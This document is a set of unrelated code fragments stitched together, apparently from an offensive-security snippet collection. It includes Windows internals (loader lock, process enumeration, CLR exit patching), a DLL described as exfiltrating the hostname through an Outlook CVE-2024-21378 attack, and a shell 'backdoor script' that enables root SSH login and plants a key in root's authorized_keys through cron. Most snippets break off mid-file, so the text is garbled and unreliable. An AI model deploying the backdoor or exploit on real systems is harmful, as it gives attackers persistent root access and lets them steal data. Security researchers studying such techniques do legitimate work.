# Copyright: (c) 2024, Jordan Borean (@jborean93) <jborean93@gmail.com>
# MIT License (see LICENSE or https://opensource.org/licenses/MIT)
Function New-ScheduledTaskSession {
<#
.SYNOPSIS
Creates a PSSession for a process running as a scheduled task.
.DESCRIPTION
Creates a PSSession that can be used to run code inside a scheduled task

// Copyright (C) 2023 Evan McBroom
// Originally authored October 19th, 2023.
//
// Geoff Chappell first documented the format of the loader lock cookie on November 26th, 2008.
// His work is applied here to unlock the loader lock without knowing the original cookie that
// LdrLockLoaderLock returned. This same example code may be safely used in DllMain to unlock
// the loader lock and execute code that would otherwise deadlock the loader.
// Sources:
// - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/ldrapi/lockloaderlock.htm
// - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/ldrapi/unlockloaderlock.htm

// Copyright (C) 2024 Evan McBroom
#include <Windows.h>
#include <iostream>
#include <vector>
#include <WbemCli.h>
#include <atlbase.h>
#include <iomanip>
// The modified, compiled IDL file from:

// Demonstrates use of NtQuerySystemInformation and SystemProcessInformation variants to enumerate processes without opening handles
// Author: TheWover
//
#include <iostream>
#include <string>
#include "ntdefs.h"
bool demoSystemProcessInformation(bool full)
{

/**
 * This DLL is designed for use in conjunction with the Ruler tool for
 * security testing related to the CVE-2024-21378 vulnerability,
 * specifically targeting MS Outlook.
 *
 * It can be used with the following command line syntax:
 * ruler [auth-params] form add-com [attack-params] --dll ./test.dll
 * Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch).
 *
 * After being loaded into MS Outlook, it sends the PC's hostname and

# Place our backdoor script into /tmp/ssh.sh
# This will be run by cron
# Run one line at a time. Do not try to paste the entire command in at once.
cat << EOF > /tmp/ssh.sh
apt update ; apt install openssh-server -y ; mkdir -p /var/run/sshd && sed -i 's/\#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config && sed 's@session\s*required\s*pam_loginuid.so@session optional pam_loginuid.so@g' -i /etc/pam.d/sshd ; mkdir -p /root/.ssh && touch /root/.ssh/authorized_keys ; echo "ENTER YOUR PUBLIC KEY HERE" >> /root/.ssh/authorized_keys ; /usr/sbin/service ssh restart
# Then type EOF and press enter
# Ensure the script has execute permissions
chmod +x /tmp/ssh.sh

// White Knight Labs - Offensive Development
// Inline Assembly - Get Function Address
#include <iostream>
#include <windows.h>
// Function definition
void* GetFunctionAddress(const char* functionName) {
void* getFunctionAddr = nullptr;

#!/bin/bash
apt install golang -y
# Export so the go toolchain and any child processes see the same paths
export GOROOT="/usr/local/go"
export GOPATH="$HOME/go"
export PATH="${PATH}:${GOROOT}/bin:${GOPATH}/bin"
go install github.com/projectdiscovery/asnmap/cmd/asnmap@latest

//
// Resolve dynamic address of Process.Environment.Exit in CLR host process using C++
//
// Based on :
// https://www.mdsec.co.uk/2020/08/massaging-your-clr-preventing-environment-exit-in-in-process-net-assemblies/
// https://github.com/yamakadi/clroxide/blob/214222d578bf62b4c7fc860125268f4eecb9f331/examples/patch_exit.rs
// https://github.com/kyleavery/inject-assembly/blob/8db977c0fd1da039df920f9dd4840d4a3ec2aa2c/src/scmain.c
// https://github.com/TheWover/donut/blob/master/loader/test/rdt.cpp ;)

#include <Windows.h>
#include <Psapi.h>
#include <metahost.h>
#include <comutil.h>
#include <mscoree.h>
#include "patch_info.h"
#include "base\helpers.h"
/**
 * For the debug build we want: